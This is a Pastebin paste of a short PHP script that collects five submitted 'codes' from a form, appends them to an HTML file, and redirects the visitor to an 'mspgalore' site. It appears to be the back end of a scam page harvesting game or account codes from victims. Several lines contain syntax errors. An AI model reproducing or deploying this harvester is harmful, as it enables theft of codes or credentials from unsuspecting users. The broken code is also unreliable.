Guest User

Untitled

a guest
Feb 11th, 2012
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.54 KB | None | 0 0
  1. <?php $line =('');
  2. $code1 = $_POST['1'];
  3. $code2 = $_POST['2'];
  4. $code3 = $_POST['3'];
  5. $code4 = $_POST['4'];
  6. $code5 = $_POST['5'];
  7. $headers .= "Content-Type: text/plain; charset=iso-8859-1\n";
  8. $mes .= '<br>Code: '.$code1.;
  9. $mes .= ' - '.$code2.
  10. $mes .= ' - '.$code3.;
  11. $mes .= ' - '.$code4.;
  12. $mes .= ' - '.$code5.;
  13. $mes .= ".$line."; $file = "dude2.html";
  14. $fh = fopen($file, "a");
  15. fwrite ($fh, "$mes\n"); fclose($fh);?>
  16. <?php
  17. header("Location: http://www.mspgalore.t35.com");
  18. ?>
Advertisement
Add Comment
Please, Sign In to add comment